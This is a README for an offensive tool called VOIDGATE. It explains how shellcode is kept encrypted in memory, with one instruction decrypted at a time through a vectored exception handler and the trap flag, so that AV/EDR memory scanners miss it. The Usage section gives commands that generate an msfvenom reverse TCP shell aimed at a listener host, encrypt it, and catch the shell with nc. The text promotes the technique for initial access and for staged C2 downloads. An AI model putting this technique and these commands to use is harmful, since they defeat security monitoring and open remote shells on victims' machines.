Home

Awesome

VOIDGATE

Description:

A technique that can be used to bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes (such as msfvenom) by performing on-the-fly decryption of individual encrypted assembly instructions, thus rendering memory scanners useless for that specific memory page.


How it works:

This technique will create a PAGE_EXECUTE_READWRITE memory region where the encrypted assembly instructions will be stored. The shellcode will be wrapped around some padding. The program will set a Hardware Breakpoint (HWBP) on the entrypoint of the shellcode.

Next, the program will install a Vectored Exception Handler (VEH). This VEH will basically act like a debugger, single stepping through the code, reading the instruction pointer register (RIP) for each SINGLE STEP exception received by the VEH, and decrypting the next 16 bytes (maximum x64 assembly instruction length) where RIP points . The VEH also encrypts back the previously decrypted instruction, ensuring that the rest of the shellcode stays always encrypted with the exception of the single assembly instruction currently executed. After that, it will continue execution, with the TRAP FLAG configured on the Eflags register. This will ensure that the next assembly instruction will also trigger a breakpoint exception that the VEH can handle.

After the VEH installation, the main thread execution will be redirected to the payload entrypoint. When the HWBP will be triggered at the entrypoint, the VEH will stop at each assembly instruction executed, perform the decryption of the next assembly instruction and encrypt the previous encrypted instruction which is saved as a global variable.

By doing this, basically one single assembly instruciton is decrypted at a time, with the rest of the payload staying encrypted.


Limitations:

NOTE: This technique is ideal to obtain an initial access using a basic shellcode such as msfvenom or custom revers shells. This can also be used as an initial stage 1 payload that downloads the rest of the payload from the C2 server.

NOTE: This technique is not compatible with all payloads (such as reflective loaders) . Below is a list of current limitations:


Usage:

How to reproduce the POC:

 msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.100.33 LPORT=443 -f raw > shell.asm
./XorEncryptPayload.exe C:\Path\to\shell.asm
nc -nvlp 443

Demo:


Disclaimer

This repository is for academic purposes, the use of this software is your responsibility.